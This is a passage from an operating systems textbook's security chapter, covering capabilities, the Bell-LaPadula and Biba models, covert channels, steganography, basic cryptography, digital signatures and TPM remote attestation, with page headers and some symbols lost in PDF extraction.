only access. First the server verifies that the capability is valid.  If so, it computes
f (Object, New rights, Check) and generates a new capability putting this value in



610                             SECURITY                                    CHAP. 9
the fourth field. Note that the original Check value is used because other outstand-
ing capabilities depend on it.
     This new capability is sent back to the requesting process. The user can now
give this to a friend by just sending it in a message.       If the friend turns on rights
bits that should be off, the server will detect this when the capability is used since
the  f  value will not correspond to the false rights field. Since the friend does not
know the true check field, he cannot fabricate a capability that corresponds to the
false rights bits. This scheme was developed for the Amoeba system (Tanenbaum
et al., 1990).
     In addition to the specific object-dependent rights, such as read and execute,
capabilities (both kernel and cryptographically protected) usually have generic
rights which are applicable to all objects. Examples of generic rights are
        1.  Copy capability: create a new capability for the same object.
        2.  Copy object: create a duplicate object with a new capability.
        3.  Remove capability: delete an entry from the C-list; object unaffected.
        4.  Destroy object: permanently remove an object and a capability.
     A last remark worth making about capability systems is that revoking access to
an object is quite difficult in the kernel-managed version.     It is hard for the system
to find all the outstanding capabilities for any object to take them back, since they
may be stored in C-lists all over the disk. One approach is to have each capability
point to an indirect object, rather than to the object itself.  By having the indirect
object point to the real object, the system can always break that connection, thus
invalidating the capabilities. (When a capability to the indirect object is later pres-
ented to the system, the user will discover that the indirect object is now pointing
to a null object.)
     In the Amoeba scheme, revocation is easy. All that needs to be done is change
the check field stored with the object.  In one blow, all existing capabilities are
invalidated. However, neither scheme allows selective revocation, that is, taking
back, say, John's permission, but nobody else's.        This defect is generally recog-
nized to be a problem with all capability systems.
     Another general problem is making sure the owner of a valid capability does
not give a copy to 1000 of his best friends. Having the kernel manage capabilities,
as in Hydra, solves the problem, but this solution does not work well in a distrib-
uted system such as Amoeba.
     Very briefly summarized, ACLs and capabilities have somewhat complemen-
tary properties. Capabilities are very efficient because if a process says ``Open the
file pointed to by capability 3'' no checking is needed. With ACLs, a (potentially
long) search of the ACL may be needed. If groups are not supported, then granting
everyone read access to a file requires enumerating all users in the ACL. Capabili-
ties also allow a process to be encapsulated easily, whereas ACLs do not.           On the



SEC. 9.3                CONTROLLING ACCESS TO RESOURCES                                  611
other hand, ACLs allow selective revocation of rights, which capabilities do not.
Finally, if an object is removed and the capabilities are not or vice versa, problems
arise. ACLs do not suffer from this problem.
    Most users are familiar with ACLs, because they are common in operating sys-
tems like Windows and UNIX.        However, capabilities are not that uncommon ei-
ther. For instance, the L4 kernel that runs on many smartphones from many manu-
facturers (typically alongside or underneath other operating systems like Android),
is  capability  based.  Likewise,  the  FreeBSD  has      embraced  Capsicum,  bringing
capabilities to a popular member of the UNIX family.
9.4 FORMAL MODELS OF SECURE SYSTEMS
    Protection matrices, such as that of Fig. 9-4, are not static. They frequently
change as new objects are created, old objects are destroyed, and owners decide to
increase or restrict the set of users for their objects.  A considerable amount of
attention has been paid to modeling protection systems in which the protection ma-
trix is constantly changing. We will now touch briefly upon some of this work.
    Decades ago, Harrison et al. (1976) identified six primitive operations on the
protection matrix that can be used as a base to model any protection system. These
primitive operations are create object, delete object, create domain, delete domain,
insert right, and remove right.    The two latter primitives insert and remove rights
from specific matrix elements, such as granting domain 1 permission to read File6.
    These six primitives can be combined into protection commands.             It is these
protection commands that user programs can execute to change the matrix. They
may not execute the primitives directly.      For example, the system might have a
command to create a new file, which would test to see if the file already existed,
and if not, create a new object and give the owner all rights to it. There might also
be a command to allow the owner to grant permission to read the file to everyone
in the system, in effect, inserting the ``read'' right in the new file's entry in every
domain.
    At any instant, the matrix determines what a process in any domain can do, not
what it is authorized to do. The matrix is what is enforced by the system; autho-
rization has to do with management policy.    As an example of this distinction, let
us consider the simple system of Fig. 9-10 in which domains correspond to users.
In Fig. 9-10(a) we see the intended protection policy: Henry can read and write
mailbox7, Robert can read and write secret, and all three users can read and ex-
ecute compiler.
    Now imagine that Robert is very clever and has found a way to issue com-
mands to have the matrix changed to Fig. 9-10(b).         He has now gained access to
mailbox7, something he is not authorized to have.     If he tries to read it, the operat-
ing system will carry out his request because it does not know that the state of
Fig. 9-10(b) is unauthorized.



612                                       SECURITY                                           CHAP. 9
                       Objects                                                    Objects
             Compiler  Mailbox 7  Secret                             Compiler     Mailbox 7  Secret
       Eric  Read                                            Eric    Read
             Execute                                                 Execute
Henry        Read      Read                                  Henry   Read         Read
             Execute   Write                                         Execute      Write
Robert       Read                 Read                       Robert  Read         Read       Read
             Execute              Write                              Execute                 Write
                       (a)                                                        (b)
             Figure 9-10.         (a) An authorized  state.  (b) An unauthorized  state.
     It should now be clear that the set of all possible matrices can be partitioned
into two disjoint sets: the set of all authorized states and the set of all unauthorized
states.      A question around which much theoretical research has revolved is this:
``Given an initial authorized state and a set of commands, can it be proven that the
system can never reach an unauthorized state?''
     In effect, we are asking if the available mechanism (the protection commands)
is adequate to enforce some protection policy. Given this policy, some initial state
of the matrix, and the set of commands for modifying the matrix, what we would
like is a way to prove that the system is secure. Such a proof turns out quite dif-
ficult to acquire; many general-purpose systems are not theoretically secure.                        Har-
rison et al. (1976) proved that in the case of an arbitrary configuration for an arbi-
trary protection system, security is theoretically undecidable. However, for a spe-
cific system, it may be possible to prove whether the system can ever move from
an authorized state to an unauthorized state. For more information, see Landwehr
(1981).
9.4.1 Multilevel Security
     Most operating systems allow individual users to determine who may read and
write their files and other objects. This policy is called discretionary access con-
trol.    In many environments this model works fine, but there are other environ-
ments where much tighter security is required, such as the military, corporate pa-
tent departments, and hospitals.          In the latter environments, the organization has
stated rules about who can see what, and these may not be modified by individual
soldiers, lawyers, or doctors, at least not without getting special permission from
the boss (and probably from the boss' lawyers as well). These environments need
mandatory access controls to ensure that the stated security policies are enforced
by the system, in addition to the standard discretionary access controls. What these
mandatory access controls do is regulate the flow of information, to make sure that
it does not leak out in a way it is not supposed to.



SEC. 9.4              FORMAL MODELS OF SECURE SYSTEMS                                    613
The Bell-LaPadula Model
The most widely used multilevel security model is the Bell-LaPadula model
so we will start there (Bell and LaPadula, 1973).        This model was designed for
handling military security, but it is also applicable to other organizations.      In the
military world, documents (objects) can have a security level, such as unclassified,
confidential, secret, and top secret. People are also assigned these levels, depend-
ing on which documents they are allowed to see.    A general might be allowed to
see all documents, whereas a lieutenant might be restricted to documents cleared as
confidential and lower.   A process running on behalf of a user acquires the user's
security level. Since there are multiple security levels, this scheme is called a mul-
tilevel security system.
The Bell-LaPadula model has rules about how information can flow:
1.        The simple security property: A process running at security level k
          can read only objects at its level or lower. For example, a general can
          read a lieutenant's documents but a lieutenant cannot read a general's
          documents.
2.        The * property: A process running at security level k can write only
          objects at its level or higher. For example, a lieutenant can append a
          message to a general's mailbox telling everything he knows, but a
          general cannot append a message to a lieutenant's mailbox telling
          everything he knows because the general may have seen top-secret
          documents that may not be disclosed to a lieutenant.
Roughly summarized, processes can read down and write up, but not the reverse.
If the system rigorously enforces these two properties, it can be shown that no
information can leak out from a higher security level to a lower one. The * proper-
ty was so named because in the original report, the authors could not think of a
good name for it and used * as a temporary placeholder until they could devise a
better name. They never did and the report  was  printed with the *.  In this model,
processes read and write objects, but do not communicate with each other directly.
The Bell-LaPadula model is illustrated graphically in Fig. 9-11.
In this figure a (solid) arrow from an object to a process indicates that the proc-
ess is reading the object, that is, information is flowing from the object to the proc-
ess. Similarly, a (dashed) arrow from a process to an object indicates that the proc-
ess is writing into the object, that is, information is flowing from the process to the
object. Thus all information flows in the direction of the arrows.    For example,
process B can read from object 1 but not from object 3.
The simple security property says that all solid (read) arrows go sideways or
upward. The * property says that all dashed (write) arrows also go sideways or
upward. Since information flows only horizontally or upward, any information that
starts out at level k can never appear at a lower level. In other words, there is never



614                                        SECURITY                                      CHAP.  9
                           Security   level
                                  4                       5                       E      6
           Legend
Process            Object
                                             3            C                       4      D
           Read                   3
                                             B            2
           Write                  2
                                  1          1            A
                       Figure 9-11. The Bell-LaPadula multilevel security model.
a path that moves information downward, thus guaranteeing the security of the
model.
     The Bell-LaPadula model refers to organizational structure, but ultimately has
to be enforced by the operating system.         One way this could be done is by assign-
ing each user a security level, to be stored along with other user-specific data such
as the UID and GID. Upon login, the user's shell would acquire the user's security
level and this would be inherited by all its children. If a process running at security
level k attempted to open a file or other object whose security level is greater than
k, the operating system should reject the open attempt. Similarly attempts to open
any object of security level less than k for writing must fail.
The Biba Model
     To summarize the Bell-LaPadula model in military terms, a lieutenant can ask
a private to reveal all he knows and then copy this information into a general's file
without violating security. Now let us put the same model in civilian terms.             Imag-
ine a company in which janitors have security level 1, programmers have security
level  3,  and    the  president  of  the  company   has     security  level         5.  Using Bell-
LaPadula, a programmer can query a janitor about the company's future plans and
then overwrite the president's files that contain corporate strategy. Not all com-
panies might be equally enthusiastic about this model.
     The problem with the Bell-LaPadula model is that it was devised to keep
secrets, not guarantee the integrity of the data. For the latter, we need precisely the
reverse properties (Biba, 1977):



SEC. 9.4   FORMAL MODELS OF SECURE SYSTEMS                                                 615
       1.  The simple integrity property: A process running at security level k
           can write only objects at its level or lower (no write up).
       2.  The integrity * property: A process running at security level k can
           read only objects at its level or higher (no read down).
Together, these properties ensure that the programmer can update the janitor's files
with information acquired from the president, but not vice versa.         Of course, some
organizations want both the Bell-LaPadula properties and the Biba properties, but
these are in direct conflict so they are hard to achieve simultaneously.
9.4.2 Covert Channels
All these ideas about formal models and provably secure systems sound great,
but do they actually work?      In a word: No.  Even in a system which has a proper
security model underlying it and which has been proven to be secure and is cor-
rectly implemented, security leaks can still occur.  In this section we discuss how
information can still leak out even when it has been rigorously proven that such
leakage is mathematically impossible. These ideas are due to Lampson (1973).
Lampson's model was originally formulated in terms of a single timesharing
system, but the same ideas can be adapted to LANs and other multiuser environ-
ments, including applications running in the cloud.  In the purest form, it involves
three processes on some protected machine.      The first process, the client, wants
some work performed by the second one, the server. The client and the server do
not entirely trust each other.  For example, the server's job is to help clients with
filling out their tax forms. The clients are worried that the server will secretly
record their financial data, for example, maintaining a secret list of who earns how
much, and then selling the list. The server is worried that the clients will try to steal
the valuable tax program.
The third process is the collaborator, which is conspiring with the server to
indeed steal the client's confidential data. The collaborator and server are typically
owned by the same person.       These three processes are shown in Fig. 9-12.  The ob-
ject of this exercise is to design a system in which it is impossible for the server
process to leak to the collaborator process the information that it has legitimately
received from the client process. Lampson called this the confinement problem.
From the system designer's point of view, the goal is to encapsulate or confine
the server in such a way that it cannot pass information to the collaborator. Using a
protection-matrix scheme we can easily guarantee that the server cannot communi-
cate with the collaborator by writing a file to which the collaborator has read ac-
cess.  We can probably also ensure that the server cannot communicate with the
collaborator using the system's interprocess communication mechanism.
Unfortunately, more subtle communication channels may also be available. For
example, the server can try to communicate a binary bit stream as follows. To send



616                                   SECURITY                                              CHAP. 9
         Client  Server  Collaborator                Encapsulated server
                 Kernel                                Kernel                  Covert
                                                                               channel
                 (a)                                      (b)
         Figure 9-12. (a) The client, server, and collaborator processes. (b) The encapsu-
         lated server can still leak to the collaborator via covert channels.
a 1 bit, it computes as hard as it can for a fixed interval of time.           To send a 0 bit, it
goes to sleep for the same length of time.
     The collaborator can try to detect the bit stream by carefully monitoring its re-
sponse time.  In general, it will get better response when the server is sending a 0
than when the server is sending a 1.      This communication channel is known as a
covert channel, and is illustrated in Fig. 9-12(b).
     Of course, the covert channel is a noisy channel, containing a lot of extraneous
information, but information can be reliably sent over a noisy channel by using an
error-correcting code (e.g., a Hamming code, or even something more sophisti-
cated).  The use of an error-correcting code reduces the already low bandwidth of
the covert channel even more, but it still may be enough to leak substantial infor-
mation.  It is fairly obvious that no protection model based on a matrix of objects
and domains is going to prevent this kind of leakage.
     Modulating the CPU usage is not the only covert channel. The paging rate can
also be modulated (many page faults for a 1, no page faults for a 0). In fact, almost
any way of degrading system performance in a clocked way is a candidate.                    If the
system provides a way of locking files, then the server can lock some file to indi-
cate a 1, and unlock it to indicate a 0.    On some systems, it may be possible for a
process to detect the status of a lock even on a file that it cannot access. This covert
channel is illustrated in Fig. 9-13, with the file locked or unlocked for some fixed
time interval known to both the server and collaborator.       In this example, the secret
bit stream 11010100 is being transmitted.
     Locking and unlocking a prearranged file, S, is not an especially noisy channel,
but it does require fairly accurate timing unless the bit rate is very low. The
reliability and performance can be increased even more using an acknowledgement
protocol. This protocol uses two more files, F1 and F2, locked by the server and
collaborator, respectively, to keep the two processes synchronized. After the server
locks or unlocks S, it flips the lock status of F1 to indicate that a bit has been sent.
As soon as the collaborator has read out the bit, it flips F2's lock status to tell the
server it is ready for another bit and waits until F1 is flipped again to indicate that



SEC. 9.4            FORMAL MODELS OF SECURE SYSTEMS                                       617
Server
Server locks                                                              Server unlocks
file to send 1                                                            file to send 0
                 1  1          0  1              0      1  0           0     Bit stream sent
Collaborator
                                  Time
                    Figure 9-13. A covert channel using file locking.
another bit is present in S. Since timing is no longer involved, this protocol is fully
reliable, even in a busy system, and can proceed as fast as the two processes can
get scheduled.   To get higher bandwidth, why not use two files per bit time, or
make it a byte-wide channel with eight signaling files, S0 through S7?
Acquiring and releasing dedicated resources (tape drives, plotters, etc.)                 can
also be used for signaling. The server acquires the resource to send a 1 and releases
it to send a 0.  In UNIX, the server could create a file to indicate a 1 and remove it
to indicate a 0; the collaborator could use the access system call to see if the file
exists. This call works even though the collaborator has no permission to use the
file. Unfortunately, many other covert channels exist.
Lampson also mentioned a way of leaking information to the (human) owner
of the server process. Presumably the server process will be entitled to tell its
owner how much work it did on behalf of the client, so the client can be billed.          If
the actual computing bill is, say, $100 and the client's income is $53,000, the ser-
ver could report the bill as $100.53 to its owner.
Just finding all the covert channels, let alone blocking them, is nearly hopeless.
In practice, there is little that can be done.   Introducing a process that causes page
faults at random or otherwise spends its time degrading system performance in
order to reduce the bandwidth of the covert channels is not an attractive idea.
Steganography
A slightly different kind of covert channel can be used to pass secret infor-
mation between processes, even though a human or automated censor gets to
inspect all messages between the processes and veto the suspicious ones. For ex-
ample, consider a company that manually checks all outgoing email sent by com-
pany employees to make sure they are not leaking secrets to accomplices or com-
petitors outside the company.  Is there a way for an employee to smuggle substan-
tial volumes of confidential information right out under the censor's nose?      It turns
out there is and it is not all that hard to do.



618                                   SECURITY                                         CHAP. 9
     As a case in point, consider Fig. 9-14(a). This photograph, taken by the author
in Kenya, contains three zebras contemplating an acacia tree.       Fig. 9-14(b) appears
to be the same three zebras and acacia tree, but it has an extra added attraction.      It
contains the complete, unabridged text of five of Shakespeare's plays embedded in
it: Hamlet, King Lear, Macbeth, The Merchant of Venice, and Julius Caesar.              To-
gether, these plays total over 700 KB of text.
                      (a)                                      (b)
     Figure 9-14. (a) Three zebras and a tree. (b) Three zebras, a tree, and the com-
     plete text of five plays by William Shakespeare.
     How does this covert channel work?         The original color image is 1024  768
pixels. Each pixel consists of three 8-bit numbers, one each for the red, green, and
blue intensity of that pixel. The pixel's color is formed by the linear superposition
of the three colors.  The encoding method uses the low-order bit of each RGB
color value as a covert channel. Thus each pixel has room for 3 bits of secret infor-
mation, one in the red value, one in the green value, and one in the blue value.
With an image of this size, up to 1024  768  3 bits (294,912 bytes) of secret
information can be stored in it.
     The full text of the five plays and a short notice adds up to 734,891 bytes. This
was first compressed to about 274 KB using a standard compression algorithm.
The compressed output was then encrypted and inserted into the low-order bits of
each color value.  As can be seen (or actually, cannot be seen), the existence of the
information is completely invisible.  It is equally invisible in the large, full-color
version of the photo. The eye cannot easily distinguish 7-bit color from 8-bit color.
Once the image file has gotten past the censor, the receiver just strips off all the
low-order bits, applies the decryption and decompression algorithms, and recovers
the original 734,891 bytes. Hiding the existence of information like this is called
steganography (from the Greek words for ``covered writing'').       Steganography is
not popular in dictatorships that try to restrict communication among their citizens,
but it is popular with people who believe strongly in free speech.



SEC. 9.4              FORMAL MODELS OF SECURE SYSTEMS                                   619
Viewing the two images in black and white with low resolution does not do
justice to how powerful the technique is.  To get a better feel for how steganogra-
phy works, one of the authors (AST) has prepared a demonstration for Windows
systems, including the full-color image of Fig. 9-14(b) with the five plays embed-
ded in it. The demonstration can be found at the URL www.cs.vu.nl/~ast/ .             Click
on the covered writing link there under the heading STEGANOGRAPHY DEMO.
Then follow the instructions on that page to download the image and the steganog-
raphy tools needed to extract the plays.   It is hard to believe this, but give it a try:
seeing is believing.
Another use of steganography is to insert hidden watermarks into images used
on Web pages to detect their theft and reuse on other Web pages. If your Web page
contains an image with the secret message ``Copyright 2014, General Images Cor-
poration'' you might have a tough time convincing a judge that you produced the
image yourself. Music, movies, and other kinds of material can also be watermark-
ed in this way.
Of course, the fact that watermarks are used like this encourages some people
to look for ways to remove them.  A scheme that stores information in the low-
order bits of each pixel can be defeated by rotating the image 1 degree clockwise,
then converting it to a lossy system such as JPEG, then rotating it back by 1
degree. Finally, the image can be reconverted to the original encoding system (e.g.,
gif, bmp, tif).  The lossy JPEG conversion will mess up the low-order bits and the
rotations involve massive floating-point calculations, which introduce roundoff er-
rors, also adding noise to the low-order bits. The people putting in the watermarks
know this (or should know this), so they put in their copyright information redun-
dantly and use schemes besides just using the low-order bits of the pixels.  In turn,
this stimulates the attackers to look for better removal techniques. And so it goes.
Steganography can be used to leak information in a covert way, but it is more
common that we want to do the opposite: hide the information from the prying eys
of attackers, without necessarily hiding the fact that we are hiding it. Like Julius
Caesar, we want to ensure that even if our messages or files fall in the wrong
hands, the attacker will not be able to detect the secret information. This is the do-
main of cryptography and the topic of the next section.
9.5 BASICS OF CRYPTOGRAPHY
Cryptography plays an important role in security. Many people are familiar
with newspaper cryptograms, which are little puzzles in which each letter has been
systematically replaced by a different one. These have as much to do with modern
cryptography as hot dogs have to do with haute cuisine. In this section we will give
a bird's-eye view of cryptography in the computer era. As mentioned earlier, oper-
ating systems use cryptography in many places. For instance, some file systems
can encrypt all the data on disk, protocols like IPSec may encrypt and/or sign all



620                            SECURITY                                         CHAP. 9
network packets, and most operating systems scramble passwords to prevent at-
tackers from recovering them. Moreover, in Sec. 9.6, we will discuss the role of en-
cryption in another important aspect of security: authentication.
     We will look at the basic primitives used by these systems. However, a serious
discussion of cryptography is beyond the scope of this book. Many excellent books
on computer security discuss the topic at length. The interested reader is referred to
these (e.g., Kaufman et al., 2002; and Gollman, 2011).      Below we will give a very
quick discussion of cryptography for readers not familiar with it at all.
     The purpose of cryptography is to take a message or file, called the plaintext,
and encrypt it into ciphertext in such a way that only authorized people know how
to convert it back to plaintext. For all others, the ciphertext is just an incomprehen-
sible pile of bits.   Strange as it may sound to beginners in the area, the encryption
and decryption algorithms (functions) should always be public. Trying to keep
them secret almost never works and gives the people trying to keep the secrets a
false sense of security. In the trade, this tactic is called security by obscurity and
is employed only by security amateurs. Oddly enough, the category of amateurs
also includes many huge multinational corporations that really should know better.
     Instead, the secrecy depends on parameters to the algorithms called keys.           If P
is the plaintext file, KE is the encryption key, C is the ciphertext, and E is the en-
cryption algorithm (i.e., function), then C  =  E(P, KE ).  This is the definition of en-
cryption. It says that the ciphertext is obtained by using the (known) encryption al-
gorithm, E, with the plaintext, P, and the (secret) encryption key, KE , as parame-
ters. The idea that the algorithms should all be public and the secrecy should reside
exclusively in the keys is called Kerckhoffs' principle, formulated by the 19th
century Dutch cryptographer Auguste Kerckoffs. All serious cryptographers sub-
scribe to this idea.
     Similarly, P = D(C, KD) where D is the decryption algorithm and KD is the
decryption key. This says that to get the plaintext, P, back from the ciphertext, C,
and the decryption key, KD, one runs the algorithm D with C and KD as parame-
ters. The relation between the various pieces is shown in Fig. 9-15.
9.5.1 Secret-Key Cryptography
     To make this clearer, consider an encryption algorithm in which each letter is
replaced by a different letter, for example, all As are replaced by Qs, all Bs are re-
placed by W s, all Cs are replaced by Es, and so on like this:
plaintext:            A B C D E F GH I J K LMNO P Q R S T UVWXY Z
ciphertext:           QWE R T YU I O PA S D F GH J K L Z X C V B NM
This general system is called a monoalphabetic substitution, with the key being
the 26-letter string corresponding to the full alphabet. The encryption key in this
example is QWERTYUIOPASDFGHJKLZXCVBNM.                      For the key given above, the



SEC. 9.5                        BASICS OF CRYPTOGRAPHY                                                  621
                                Encryption key                         Decryption key
                    KE                                        KD
                                C = E(P, KE)                      P = D(C, KD)
      P             E                                         D                          P
                                Ciphertext
      Plaintext in  Encryption                   Decryption                              Plaintext out
                    algorithm                    algorithm
                    Encryption                                   Decryption
                    Figure 9-15. Relationship between the plaintext and the ciphertext.
plaintext ATTACK would be transformed into the ciphertext QZZQEA.                        The de-
cryption key tells how to get back from the ciphertext to the plaintext.                 In this ex-
ample, the decryption key is KXVMCNOPHQRSZYIJADLEGWBUFT because an A
in the ciphertext is a K in the plaintext, a B in the ciphertext is an X in the plaintext,
etc.
      At first glance this might appear to be a safe system because although the
cryptanalyst knows the general system (letter-for-letter substitution), he does not
know which of the 26!  4  1026 possible keys is in use. Nevertheless, given a sur-
prisingly small amount of ciphertext, the cipher can be broken easily. The basic at-
tack takes advantage of the statistical properties of natural languages.                 In English,
for example, e is the most common letter, followed by t, o, a, n, i, etc. The most
common two-letter combinations, called digrams, are th, in, er, re, and so on.
Using this kind of information, breaking the cipher is easy.
      Many cryptographic systems, like this one, have the property that given the en-
cryption key it is easy to find the decryption key. Such systems are called secret-
key cryptography or symmetric-key cryptography.               Although monoalphabetic
substitution ciphers are completely worthless, other symmetric key algorithms are
known and are relatively secure if the keys are long enough. For serious security,
minimally 256-bit keys should be used, giving a search space of 2256  1. 2  1077
keys. Shorter keys may thwart amateurs, but not major governments.
9.5.2 Public-Key Cryptography
      Secret-key systems are efficient because the amount of computation required
to encrypt or decrypt a message is manageable, but they have a big drawback: the
sender and receiver must both be in possession of the shared secret key. They may
even have to get together physically for one to give it to the other.                    To get around
this problem, public-key cryptography is used (Diffie and Hellman, 1976).                   This



622                                      SECURITY                          CHAP. 9
system has the property that distinct keys are used for encryption and decryption
and that given a well-chosen encryption key, it is virtually impossible to discover
the corresponding decryption key. Under these circumstances, the encryption key
can be made public and only the private decryption key kept secret.
     Just to give a feel for public-key cryptography, consider the following two
questions:
Question 1: How much is 314159265358979  314159265358979?
Question 2: What is the square root of 3912571506419387090594828508241?
Most sixth graders, if given a pencil, paper, and the promise of a really big ice
cream sundae for the correct answer, could answer question 1 in an hour or two.
Most adults given a pencil, paper, and the promise of a lifetime 50% tax cut could
not solve question 2 at all without using a calculator, computer, or other external
help. Although squaring and square rooting are inverse operations, they differ enor-
mously in their computational complexity. This kind of asymmetry forms the basis
of public-key cryptography.      Encryption makes use of the easy operation but de-
cryption without the key requires you to perform the hard operation.
     A public-key system called RSA exploits the fact that multiplying really big
numbers is much easier for a computer to do than factoring really big numbers, es-
pecially when all arithmetic is done using modulo arithmetic and all the numbers
involved have hundreds of digits (Rivest et al., 1978).  This system is widely used
in the cryptographic world. Systems based on discrete logarithms are also used (El
Gamal, 1985). The main problem with public-key cryptography is that it is a thou-
sand times slower than symmetric cryptography.
     The way public-key cryptography works is that everyone picks a (public key,
private key) pair and publishes the public key. The public key is the encryption
key; the private key is the decryption key.          Usually, the key generation is auto-
mated, possibly with a user-selected password fed into the algorithm as a seed.           To
send a secret message to a user, a correspondent encrypts the message with the re-
ceiver's public key. Since only the receiver has the private key, only the receiver
can decrypt the message.
9.5.3 One-Way Functions
     In various situations that we will see later it is desirable to have some function,
f , which has the property that given f and its parameter x, computing y = f (x) is
easy  to  do,  but  given  only  f (x),  finding  x  is computationally  infeasible.  Such a
function typically mangles the bits in complex ways.     It might start out by ini-
tializing y to x. Then it could have a loop that iterates as many times as there are 1
bits in x, with each iteration permuting the bits of y in an iteration-dependent way,
adding in a different constant on each iteration, and generally mixing the bits up
very thoroughly. Such a function is called a cryptographic hash function.



SEC. 9.5                     BASICS OF CRYPTOGRAPHY                                            623
9.5.4 Digital Signatures
Frequently it is necessary to sign a document digitally. For example, suppose a
bank customer instructs the bank to buy some stock for him by sending the bank an
email message.   An hour after the order has been sent and executed, the stock
crashes.  The customer now denies ever having sent the email. The bank can pro-
duce the email, of course, but the customer can claim the bank forged it in order to
get a commission. How does a judge know who is telling the truth?
Digital signatures make it possible to sign emails and other digital documents
in such a way that they cannot be repudiated by the sender later. One common way
is to first run the document through a one-way cryptographic hashing algorithm
that is very hard to invert. The hashing function typically produces a fixed-length
result independent of the original document size. The most popular hashing func-
tions used is SHA-1 (Secure Hash Algorithm), which produces a 20-byte result
(NIST, 1995).    Newer versions of SHA-1 are SHA-256 and SHA-512, which pro-
duce 32-byte and 64-byte results, respectively, but they are less widely used to
date.
The next step assumes the use of public-key cryptography as described above.
The document owner then applies his private key to the hash to get D(hash).                    This
value, called the signature block, is appended to the document and sent to the re-
ceiver, as shown in Fig. 9-16.    The application of   D to the hash is sometimes
referred to as decrypting the hash, but it is not really a decryption because the hash
has not been encrypted. It is just a mathematical transformation on the hash.
                 Document
                 compressed             Hash value
                 to a hash              run through D
       Original  value            Hash                                               Original
       document                                     D(Hash)                          document
                                                             Signature               D(Hash)
                                                             block
                             (a)                                                     (b)
          Figure 9-16. (a) Computing a signature block. (b) What the receiver gets.
When the document and hash arrive, the receiver first computes the hash of the
document using SHA-1 or whatever cryptographic hash function has been agreed
upon in advance. The receiver then applies the sender's public key to the signature
block to get E(D(hash)).     In effect, it ``encrypts'' the decrypted hash, canceling it
out and getting the hash back. If the computed hash does not match the hash from
the signature block, the document, the signature block, or both have been tampered
with (or changed by accident).    The value of this scheme is that it applies (slow)



624                                     SECURITY                                   CHAP. 9
public-key cryptography only to a relatively small piece of data, the hash. Note
carefully that this method works only if for all x
     E (D (x)) = x
It is not guaranteed a priori that all encryption functions will have this property
since all that we originally asked for was that
     D (E (x)) = x
that is, E   is the encryption function and  D   is the decryption function.       To get the
signature property in addition, the order of application must not matter, that is, D
and E must be commutative functions. Fortunately, the RSA algorithm has this
property.
     To use this signature scheme, the receiver must know the sender's public key.
Some users publish their public key on their Web page. Others do not because they
may be afraid of an intruder breaking in and secretly altering their key. For them,
an alternative mechanism is needed to distribute public keys.     One common meth-
od is for message senders to attach a certificate to the message, which contains the
user's name and public key and is digitally signed by a trusted third party. Once the
user has acquired the public key of the trusted third party, he can accept certificates
from all senders who use this trusted third party to generate their certificates.
     A trusted third party that signs certificates is called a CA (Certification Auth-
ority).  However, for a user to verify a certificate signed by a CA, the user needs
the CA's public key. Where does that come from and how does the user know it is
the real one?  To do this in a general way requires a whole scheme for managing
public keys, called a PKI (Public Key Infrastructure).         For Web browsers, the
problem is solved in an ad hoc way: all browsers come preloaded with the public
keys of about 40 popular CAs.
     Above we have described how public-key cryptography can be used for digital
signatures.  It is worth mentioning that schemes that do not involve public-key
cryptography also exist.
9.5.5 Trusted Platform Modules
     All cryptography requires keys.    If the keys are compromised, all the security
based on them is also compromised.      Storing the keys securely is thus essential.
How does one store keys securely on a system that is not secure?
     One proposal that the industry has come up with is a chip called the TPM
(Trusted Platform Module), which is a cryptoprocessor with some nonvolatile
storage inside it for keys. The TPM can perform cryptographic operations such as
encrypting blocks of plaintext or decrypting blocks of ciphertext in main memory.
It can also verify digital signatures.  When all these operations are done in spe-
cialized hardware, they become much faster and are likely to be used more widely.



SEC. 9.5                    BASICS OF CRYPTOGRAPHY                                     625
Many computers already have TPM chips and many more are likely to have them
in the future.
TPM is extremely controversial because different parties have different ideas
about who will control the TPM and what it will protect from whom. Microsoft has
been a big advocate of this concept and has developed a series of technologies to
use it, including Palladium, NGSCB, and BitLocker. In its view, the operating sys-
tem controls the TPM and uses it for instance to encrypt the hard drive. However, it
also wants to use the TPM to prevent unauthorized software from being run.
``Unauthorized software'' might be pirated (i.e., illegally copied) software or just
software the operating system does not authorize.  If the TPM is involved in the
booting process, it might start only operating systems signed by a secret key placed
inside the TPM by the manufacturer and disclosed only to selected operating sys-
tem vendors (e.g., Microsoft).  Thus the TPM could be used to limit users' choices
of software to those approved by the computer manufacturer.
The music and movie industries are also very keen on TPM as it could be used
to prevent piracy of their content. It could also open up new business models, such
as renting songs or movies for a specific period of time by refusing to decrypt them
after the expiration date.
One interesting use for TPMs is known as remote attestation. Remote attesta-
tion allows an external party to verify that the computer with the TPM runs the
software it should be running, and not something that cannot be trusted. The idea is
that the attesting party uses the TPM to create ``measurements'' that consist of
hashes of the configuration. For instance, let us assume that the external party
trusts nothing on our machine, except the BIOS. If the (external) challenging party
were able to verify that we ran a trusted bootloader and not some rogue piece of
software, this would be a start. If we could additionally prove that we ran a legiti-
mate kernel on this trustworthy bootloader, even better. And if we could finally
show that on this kernel we ran the right version of a legitimate application, the
challenging party might be satisfied with respect to our trustworthiness.
Let us first consider what happens on our machine, from the moment it boots.
When the (trusted) BIOS starts, it first initializes the TPM and uses it to create a
hash of the code in memory after loading the bootloader. The TPM writes the re-
sult in a special register, known as a PCR (Platform Configuration Register).
PCRs  are  special  because     they  cannot  be  overwritten  directly--but  only  ``ex-
tended.'' To extend the PCR, the TPM takes a hash of the combination of the input
value and the previous value in the PCR, and stores that in the PCR. Thus, if our
bootloader is benign, it will take a measurement (create a hash) for the loaded ker-
nel and extend the PCR that previously contained the measurement for the boot-
loader itself. Intuitively, we may consider the resulting cryptographic hash in the
PCR as a hash chain, which binds the kernel to the bootloader. Now the kernel in
turn creates takes a measurement of the application and extends the PCR with that.
Now let us consider what happens when an external party wants to verify that
we run the right (trustworthy) software stack and not some arbitrary other code.



626                               SECURITY            CHAP. 9
First, the challenging party creates an unpredictable value of, for example, 160
bits. This value, known as a nonce, is simply a unique identifier for this verifica-
tion request. It serves to prevent an attacker from recording the response to one re-
mote attestation request, changing the configuration on the attesting party and then
simply replaying the previous response for all subsequent attestation requests. By
incorporating a nonce in the protocol, such replays are not possible. When the
attesting side receives the attestation request (with the nonce), it uses the TPM to
create a signature (with its unique and unforgeable key) for the concatenation of
the nonce and the value of the PCR. It then sends back this signature, the nonce,
the value of the PCR, and hashes for the bootloader, the kernel, and the application.
The challenging party first checks the signature and the nonce. Next, it looks up
the three hashes in its database of trusted bootloaders, kernels, and applications. If
they are not there, the attestation fails. Otherwise, the challenging party re-creates
